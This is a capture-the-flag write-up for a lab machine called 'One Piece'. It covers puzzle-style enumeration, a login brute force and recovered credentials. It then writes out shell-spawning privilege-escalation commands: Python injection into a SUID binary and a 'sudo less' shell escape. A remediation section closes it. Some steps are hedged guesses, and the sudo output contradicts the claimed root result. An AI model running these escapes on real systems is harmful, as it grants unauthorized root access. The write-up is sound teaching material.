Target IP: 10.10.x.x (Requires /etc/hosts entry? Likely accessed via IP)
Difficulty: Hard (CTF/Puzzle Heavy)
Objective: User (M0nk3y_D_7uffy) & Root (root.txt) Flags
1. Executive Summary
“One Piece” is a Linux machine that relies heavily on Steganography, Cryptography, and OSINT. Initial access involves collecting four distinct “Poneglyphs” (encoded strings) hidden across FTP, web directories, and image metadata. These strings, when combined and decoded through a specific multi-stage pipeline, reveal SSH credentials. Privilege escalation involves exploiting a custom SUID binary via Python injection and leveraging misconfigured sudo rights on the less utility.
Key TTPs (MITRE ATT&CK):
- T1027 (Obfuscated Files or Information): Multi-layer decoding (Base32/Morse/etc.).
- T1566 (Phishing/OSINT): Leveraging GitHub repositories for wordlists.
- T1110 (Brute Force): Cracking the login page with
ffuf. - T1548.001 (Setuid and Setgid): Exploiting a custom SUID binary.
- T1548.003 (Sudo and Sudo Caching): Exploiting
sudo less.
2. Enumeration: “The Grand Line”
A. Network Scanning
Nmap revealed the standard entry points:
- 21/tcp (FTP): Anonymous allowed.
- 22/tcp (SSH): Open.
- 80/tcp (HTTP): “New World” website.
B. The FTP Leak (Poneglyph 1)
welcome.txt: Context (Zou/Zunesha)..notes.txt: Hinted atrockyou.txtand text editors..the_whale_tree/.road_poneglyph.jpg: Steganography.- Action:
stringsorsteghide(likely strings or just cat/exiftool) revealed the first encoded string. - Decoding: The “CyberChef Recipe” (Base32 -> Morse -> Binary -> Hex -> Base58 -> Base64).
C. The Web Hunt (Poneglyph 2)
-
GitHub Hint: The repo
1FreyR/LogPoseprovided a wordlist. -
Fuzzing: Using that wordlist found
/dr3ssr0s4.html. -
Image Forensics:
-
rabbit_hole.png: Hex analysis (Red Herring). -
king_kong_gun.jpg: Source code comment “Doflamingo is /ko.jpg”. -
ko.jpg: Strings revealed/wh0l3_c4k3.php. -
Cookie Manipulation: Changing the cookie to
CakeForYougranted access to the PHP page, revealing the Second Poneglyph.
D. The Login (Poneglyph 3)
- Discovery:
/r4nd0m.html-> Javascript source ->/0n1g4sh1m4.php(Login Page). - User Enumeration: Metadata of
kaido.jpegrevealed userK1ng_0f_th3_B3@sts. - Brute Force:
ffufwithrockyou.txtfound passwordthebeast. - Result: Third Poneglyph.
E. The Final Piece (Poneglyph 4)
- Discovery: A hidden endpoint
/unspecified(often found via rigorous fuzzing or logic deduction). - Result: Fourth Poneglyph.
3. Initial Access: The Pirate King
A. The Master Decryption
You gathered all parts (or the final combined string from /unspecified sometimes contains the full key in these types of CTFs, but usually you concatenate them).
The Recipe:
- Base32
- Morse Code
- Binary
- Hex
- Base58
- Base64
Result: M0nk3y_D_7uffy:1_w1ll_b3_th3_p1r@t3_k1ng!
B. SSH Login
ssh M0nk3y_D_7uffy@10.10.x.xStatus: User Access.
4. Privilege Escalation: Level 1 (Luffy -> Teach)
A. SUID Enumeration
You found a suspicious binary:
find / -perm -u=s -type f 2>/dev/null
# /usr/bin/gomugomunooo_king_kobraaaB. Analysis
Running strings suggested it runs Python commands.
Since it is SUID and accepts an argument -c (common for “command”), we can inject python code.
C. Exploitation
/usr/bin/gomugomunooo_king_kobraaa -c 'import os; os.setresuid(1000, 1000, 1000); os.system("/bin/sh")'- Why
setresuid? SUID binaries drop privileges to the real user ID ifsystem()is called directly without setting the EUID to the real UID first.setresuidforces the shell to spawn with the owner’s privileges (Teach).
Status: User 7uffy_vs_T3@ch.
5. Privilege Escalation: Level 2 (Teach -> Root)
A. Sudo Rights
sudo -l
# (7uffy_vs_T3@ch) NOPASSWD: /usr/local/bin/lessB. Exploitation (GTFOBins)
less is a pager that can execute shell commands.
- Run
lesson any file:
sudo /usr/local/bin/less /etc/passwd- Spawn shell inside
less: Type!/bin/shand hit Enter.
Result:
# whoami
rootRoot Flag: /root/root.txt.
6. Remediation (Blue Team)
- Information Leakage:
- Steganography: Remove encoded strings from public images.
- Metadata: Scrub EXIF data from images (
kaido.jpeg) to prevent username enumeration. - Source Code: Remove comments referencing hidden files (
/ko.jpg) or logic logic.
- Authentication:
- Cookies: Do not use predictable static cookies (
CakeForYou) for authentication bypass. - Brute Force: Implement rate limiting on login forms (
/0n1g4sh1m4.php).
- Privilege Escalation:
- SUID: Remove the SUID bit from custom binaries that allow arbitrary command execution (
gomugomunooo...). - Sudo: Do not grant
NOPASSWDsudo rights to binaries with shell escapes (less,vi,man,more).